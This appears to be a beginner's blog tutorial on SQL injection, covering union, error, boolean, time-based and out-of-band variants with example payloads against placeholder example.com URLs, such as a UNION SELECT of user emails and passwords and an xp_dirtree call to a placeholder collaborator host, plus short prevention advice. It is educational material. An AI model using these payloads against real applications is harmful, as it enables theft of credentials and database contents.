.png)
1 day ago
10 BOOK THIS SPACE FOR AD
ARTICLE AD
Hi Guys,
I’m back with another exciting blog, and this time we’re diving into one of the most infamous and critical security vulnerabilities: SQL Injection. Whether you’re a developer, cybersecurity enthusiast, or just someone curious about how hackers exploit web applications with the help of SQLi vulnerability, then this blog is for you. We will be mostly focusing on basics of SQLi in this and in subsequent blogs we would cover advanced SQL Injection also.
SQL Injection is a type of security vulnerability that allows attackers to interfere with the queries that an application makes to its database. It occurs when malicious SQL query is inserted into an input field of a web application such as username, password or any input field that seems to interact with the database and it get executed in database without any sanitization.
Through SQL injection vulnerability attacker can execute malicious queries that can fetch sensitive details such as username and password from the database and in worst case it can lead to RCE (Remote Code Execution).
SQL Injection aka SQLi) vulnerability can be divided into several types, depending on the technique used and the attacker’s objective. Below is the simple diagrammatic representation of different categories of SQLi.
Lets go through one by one.
During In-Band SQL Injection attacker or malicious actor utilizes the same communication channel to launch attack and get the results. This type of SQL injection is more easier to detect and exploit from attacker’s point of view. Furthermore, In-Band SQL injection can be divided into two categories namely.
Union BasedError Based(i). Union Based SQL Injection🧑🤝🧑
It utilizes the UNION SQL operator in order to extract data from different tables by combining it with the existing table from where the data is being fetched currently. There are some conditions that need to be fulfilled.
Number of columns should be sameColumns datatypes should be compatibleSteps to exploit Union Based SQL Injection🧑💻
1. Determine number of columns that the query is making while supplying user input
2. Figure out the data types of the columns (string datatype is common and helpful)
3. Utilize UNION operator to extract sensitive information from the database
https://example.com/products?id=1' order by 1--
https://example.com/products?id=1' order by 2--
https://example.com/products?id=1' order by 3-- # Got error here
https://example.com/products?id=1' UNION SELECT 'a', NULL--
https://example.com/products?id=1' UNION SELECT NULL, 'a'--
https://example.com/products?id=1' UNION SELECT email,pass from users--
(ii). Error Based SQL Injection❌
It is a type where the database generate some error that is visible to the attacker on the same channel which is utilized later to craft the suitable SQL payload. Error generation can be done by breaking the database query using a single quote or double quote.
https://example.com/products?id=1'The error is dependent upon the kind of database used in the backend, given below is an example.
You have an error in your SQL syntax; check the manual that correspond..Now we can craft our SQL payload by analyzing the SQL error.
In this type the attacker would not see the result of his/her queries but SQL Injection can be more likely inferred from the behavior of the application. It is slightly more difficult to exploit as compared to In-Band but the impact is same. Also it takes more time to exploit, however the exploitation process can be automated using tools such as SQLMap. Blind SQLi can commonly be of two types.
Boolean Based SQL InjectionTime Based SQL Injection(i). Boolean Based SQL Injection✅❌
Attacker crafts the boolean payloads and get the results if their query got executed and returns the result accordingly. It uses boolean conditions to retrieve different results that confirms the presence of Boolean Based SQLi.
Steps to exploit Boolean Based SQL Injection🧑💻
1. Craft and send Boolean condition/query that returns False and analyze the response
2. Craft and send Boolean condition/query that returns True and analyze the response
3. Fire bunch of TRUE/FALSE queries and extract out the sensitive information from the database
https://example.com/products?name=laptop' AND 1=2
https://example.com/products?name=laptop' AND SUBSTRING((SELECT password FROM users WHERE username = 'admin'), 1,
1) = 'a'
(ii). Time Based SQL Injection⌚
Attacker pauses the database for a specific interval of time that indicates Time Based SQL Injection. There are different payloads/functions available depending upon the type of database used, below are some of the examples.
MySQL: SELECT SLEEP(10)Microsoft: WAITFOR DELAY '0:0:10'
Oracle: dbms_pipe.receive_message(('a'),10)
PostgreSQL: SELECT pg_sleep(10)
The attacker uses different channel to retrieve the data by making an out of band network request via DNS or HTTP protocol.
'; exec master..xp_dirtree '//BURP_COLLBORATOR_URL/mayank'--Prepared Statements or Parameterized QueriesWhitelisting of user’s input (Partial)Stored Procedure (Partial)https://owasp.org/www-community/attacks/SQL_Injection
https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
https://portswigger.net/web-security/sql-injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.acunetix.com/websitesecurity/sql-injection/
We will be learning advanced SQL injection techniques along with exploitation in upcoming parts. Thanks for reading😇
LinkedIn: https://www.linkedin.com/in/mayank-kumar-prajapati/
Bengali (Bangladesh) · 
English (United States) ·